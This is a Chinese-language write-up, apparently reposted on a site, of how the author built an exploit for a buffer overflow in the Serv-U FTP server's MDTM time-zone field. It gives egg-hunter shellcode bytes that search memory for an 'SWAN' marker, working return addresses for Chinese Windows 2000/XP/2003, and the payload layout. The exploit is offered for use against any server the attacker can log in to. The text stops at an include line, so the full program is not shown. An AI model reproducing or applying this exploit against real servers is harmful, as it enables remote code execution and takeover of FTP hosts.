Serv-UMDTMTimeZoneExploit

Serv-U MDTM Time Zone Exploit 我用的Serv-U 5.0来测试，先构造了一个很长的时区，发现居然没有反应，反复缩短时区长度后，感觉似乎第一个空格的出现位置不能太靠后时才能触发。我猜可能命令的长度有限制，至少是被截断过再处理的，如果第一个空格出现的位置太靠后，Serv-U就以为是在查询一个长文件的修改日期，溢出就不会触发了。
于是我又回来搭了个exploit的架子，以能够触发的字符串构造的。以常规的方法确定了ret点后，用Ollydbg连接到Serv-U守护进程，看在异常处理的时候发生了些什么。结果是和想象中的一样，在一步一步地跟踪到call ebx，然后nop nop jmp 4到常规方法的应该是shellcode的地方时，我仔细数了数当前eip位置附近的内容和发送的原始字符串相同的字节数，好像是连前面加起来一共是294字节，毫无疑问的，发送数据被截断了。
这时候的第一个反应是马上去找tiny shellcode，不过很遗憾，实在是没有找到。我又翻了一下eyas的WS_FTP的那篇文章，觉得应该很像，但是那个可以有512字节的自由发挥空间，无论如何，294字节似乎少了一点。这时候大约是11点了，我打算先回去睡觉，因为看了一天的动画，满脑袋装的都是斯卡（Scar?）的恶心嘴脸，怎么写集中不了精神。
第二天过来的时候，我想试试能不能在内存中找到原始的buffer。这次我在一个超长的MTDM命令后面加了SWAN作为标记，溢出触发的时候我搜索了一下，果然在edi附近发现了原始的数据，而且似乎还有好几个拷贝。这个时候寄存器ebx/esi/edi/ebp/esp几乎都在11xxxxx附近，从这些开始往后找应该能够找到没有经过加工处理的原始数据，我觉得这个exploit应该马上可以完成了。
我的想法是把一个标记作为完整性的判断，比如buffer最后的“SWAN”，然后向前搜索到real shellcode的头，最后跳转过去执行。为了保证溢出的安全触发，我把搜索的search code放到了时区中，而把real shellcode放到了文件名中。附带说一句，这里要一个符合文件名编码的shellcode，好在前面的site chmod的时候已经解决了这个问题，直接拿来用就可以。

search code还是有点考虑的，如果是很完美的话，应该是动态定位当前位置，接管异常处理，利用奇偶校验和来判断原始buffer是否完整等等。不过越想问题越来越多，我又本来就是个懒人，做这些东西岂不是要我的命，干脆做个马马虎虎能够将就过去的就可以了。为了能够通用，ret地址没有用call ebx的0x7FFA4A1B（这玩意儿到了XP下面不行的），而是用的lion上一次site chmod中给的pop/pop/ret地址0x7ffa1571。这个据说能够连win2k3都搞定，我是没有机器可以测试，只在英文版的XP和中文版的2k下面看了一下，确实是可以用。不过用这个的话edi被改掉了，加上XP等异常处理中call ecx后ebx成了0x00000000，我就从esp开始向下搜索的，测试了一个Win2K和一个WinXP，都能找到。
废话就不用多说，跟进去看看就知道了。Search code是这样：

//"xCC"// int3; for test :-))
"x8BxDC"// mov ebx, esp; "pop ebx" is also OK
"xB8x52x57x41x4E"// mov eax, 4E415753h
"x40"// inc eax; eax eq "SWAN" now
"x43"// inc ebx
"x39x03"// cmp [ebx], eax
"x75xFB"// jne -5; search "SWAN"
"xB8x90x90x90x90"// mov eax, 90909090h
//"xCC"// int3; for test
"x4B"// dec ebx
"x39x03"// cmp [ebx], eax
"x75xFB"// jne -5; search nop/nop/nop/nop
"xFFxD3"// call ebx
"x20x20";// <SP> to ensure the overflow

大概意思就是找SWAN，找到后向前找到连续的4个nop，以次确定完整的shellcode的地址，然后跳过去执行，后面两个空格（0x20）的意思嘛，前面已经说过了~

完整一点的exploit是这样子，不用写权限，能够登陆即可。我没有测试几台机器（自己用的三台加一个虚拟机），不知道会不会有其他的未发现的问题——毕竟我是纯黑盒连蒙带猜测试的，一丁点反汇编都没有去看。还有一句话，Serv-U 5.0以下的方法要简单些，但这种方法对从3.x开始的东西都有效果，如果你觉得ret地址不爽，请自己改。这个对中文版的2k/XP/2k3有效。


/*
Serv-U allows a MDTM command that less than 294 bytes, it is too short to exploit.
However, we could send a MDTM command as long as we wish, and we can easily find our
raw buffer in the memory. To be brief, you can find that near [edi] when overflow
happened. So search from the edi, and you can exploit it.
My way to exploit this could be described as follow:

------ ---------------------- --------- ------ ---------
│ MDTM │ long buffer with ' ' │ buffer1 │ <SP> │ buffer2 │
------ ---------------------- --------- ------ ---------

buffer1:
-------------- -------------------- -------------------
│nop nop jmp 4 │ addr of "call ebx" │ short search code │
-------------- -------------------- -------------------

buffer2: (as the filename)

---------------- ---------------- -------------
│flag 0x90909090 │ real shellcode │ flag 'SWAN' │
---------------- ---------------- -------------

The real shellcode must be a valid filename, see the "site chmod exploit" to get
more information about how to make the shellcode valid.
*/

#include <winsock.h>

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有